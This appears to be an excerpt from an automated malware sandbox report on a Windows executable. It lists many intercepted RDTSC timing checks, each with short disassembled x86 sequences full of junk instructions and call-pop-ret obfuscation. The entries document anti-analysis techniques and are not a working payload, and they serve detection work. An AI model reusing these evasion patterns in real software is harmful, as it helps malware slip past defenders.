                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70D7B9 second address: 70D7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C4957 second address: 6C4993 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CB9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7290C62CB0h 0x00000017 jng 00007F7290C62CA6h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71176D second address: 711780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F7290766B2Dh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711780 second address: 7117C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7290C62CAAh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7290C62CB4h 0x00000010 jmp 00007F7290C62CB0h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop edx 0x0000001d jo 00007F7290C62CBCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711AAC second address: 711ADE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F7290766B26h 0x00000009 pop edi 0x0000000a jmp 00007F7290766B38h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007F7290766B32h 0x00000017 je 00007F7290766B2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D4E second address: 711D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D56 second address: 711D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D5C second address: 711D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jo 00007F7290C62CAEh 0x0000000d jo 00007F7290C62CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D75 second address: 711D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D79 second address: 711D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713ED9 second address: 713F2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F7290766B2Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F7290766B34h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push esi 0x0000001d jmp 00007F7290766B2Eh 0x00000022 pop esi 0x00000023 pop eax 0x00000024 call 00007F7290766B29h 0x00000029 pushad 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F2C second address: 713F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F7290C62CA6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F39 second address: 713F8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F7290766B39h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F7290766B2Eh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7290766B39h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F8B second address: 713F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F90 second address: 713FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B2Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F7290766B26h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 714168 second address: 71416C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7142CD second address: 7142D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 714DC7 second address: 714DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 714F51 second address: 714F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290766B30h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715194 second address: 715199 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715199 second address: 7151EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jbe 00007F7290766B2Ch 0x0000000f jl 00007F7290766B26h 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F7290766B28h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov edi, 216755F7h 0x00000036 push eax 0x00000037 pushad 0x00000038 je 00007F7290766B2Ch 0x0000003e jns 00007F7290766B26h 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7151EA second address: 7151F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715723 second address: 715727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715727 second address: 71572B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71572B second address: 715791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F7290766B37h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F7290766B28h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push edi 0x00000029 pop edi 0x0000002a push edi 0x0000002b mov dword ptr [ebp+150D24A4h], ecx 0x00000031 pop esi 0x00000032 push 00000000h 0x00000034 jmp 00007F7290766B2Ch 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c mov esi, eax 0x0000003e pop edi 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jnp 00007F7290766B26h 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715791 second address: 715795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715795 second address: 71579B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 718678 second address: 71867C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71867C second address: 718686 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71A779 second address: 71A78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290C62CB0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71C716 second address: 71C732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007F7290766B26h 0x0000000c popad 0x0000000d popad 0x0000000e jnp 00007F7290766B57h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F7290766B26h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71C732 second address: 71C736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71C736 second address: 71C756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F7290766B37h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71A55A second address: 71A56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F7290C62CACh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71A56F second address: 71A574 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 722F98 second address: 722F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 720BF2 second address: 720BFC instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 722F9D second address: 722FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 720BFC second address: 720C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F7290766B32h 0x00000010 ja 00007F7290766B2Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 723221 second address: 723225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 726517 second address: 726521 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 724137 second address: 72414C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72414C second address: 724150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 724150 second address: 72415A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72415A second address: 724160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 727470 second address: 727476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 727476 second address: 7274D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F7290766B35h 0x0000000b jmp 00007F7290766B2Fh 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 add ebx, 5FC6B88Ah 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F7290766B28h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov dword ptr [ebp+150D23E9h], esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F7290766B2Ch 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7285BB second address: 7285C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7285C0 second address: 7285CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 729503 second address: 72950D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72950D second address: 72958E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+150D183Dh], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F7290766B28h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F7290766B30h 0x00000032 push 00000000h 0x00000034 jl 00007F7290766B2Bh 0x0000003a mov ebx, 36ACC9E0h 0x0000003f xchg eax, esi 0x00000040 push esi 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 pop edx 0x00000045 pop esi 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 jmp 00007F7290766B30h 0x0000004e pop eax 0x0000004f pushad 0x00000050 jmp 00007F7290766B37h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72A369 second address: 72A3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7290C62CA8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007F7290C62CB7h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F7290C62CA8h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 jmp 00007F7290C62CADh 0x00000048 adc edi, 10577C86h 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+150D2495h] 0x00000056 push eax 0x00000057 push edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72A3F4 second address: 72A3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72B411 second address: 72B421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72B5B0 second address: 72B633 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7290766B28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+152619CCh], esi 0x00000011 mov ebx, edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, 6845E4E5h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov edi, dword ptr [ebp+150D2A46h] 0x0000002c mov eax, dword ptr [ebp+150D0685h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F7290766B28h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+150D1ABBh] 0x00000054 pushad 0x00000055 ja 00007F7290766B2Bh 0x0000005b mov eax, dword ptr [ebp+150D1BC2h] 0x00000061 popad 0x00000062 nop 0x00000063 push ecx 0x00000064 push ebx 0x00000065 ja 00007F7290766B26h 0x0000006b pop ebx 0x0000006c pop ecx 0x0000006d push eax 0x0000006e pushad 0x0000006f push edi 0x00000070 je 00007F7290766B26h 0x00000076 pop edi 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72B633 second address: 72B639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 73139E second address: 7313A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 731978 second address: 73197C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 73197C second address: 731982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 731C87 second address: 731CA8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290C62CACh 0x00000008 jnp 00007F7290C62CA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7290C62CADh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 731CA8 second address: 731CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7357D9 second address: 7357DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7357DF second address: 7357E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 741A06 second address: 741A0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 741A0E second address: 741A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290766B2Ah 0x00000008 jl 00007F7290766B26h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F7290766B35h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74115A second address: 74115F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74115F second address: 741170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B2Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412CC second address: 7412E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CACh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412E0 second address: 7412E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412E5 second address: 7412EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412EB second address: 7412F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412F4 second address: 7412FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415BD second address: 7415C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7290766B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415C8 second address: 7415CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415CE second address: 7415E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7290766B2Ch 0x0000000e jnc 00007F7290766B26h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415E9 second address: 7415F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7290C62CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415F3 second address: 7415FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7470EC second address: 747108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290C62CB8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 747108 second address: 747124 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7290766B30h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74D2F0 second address: 74D2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74DCE4 second address: 74DCE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74DE55 second address: 74DE5F instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290C62CB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
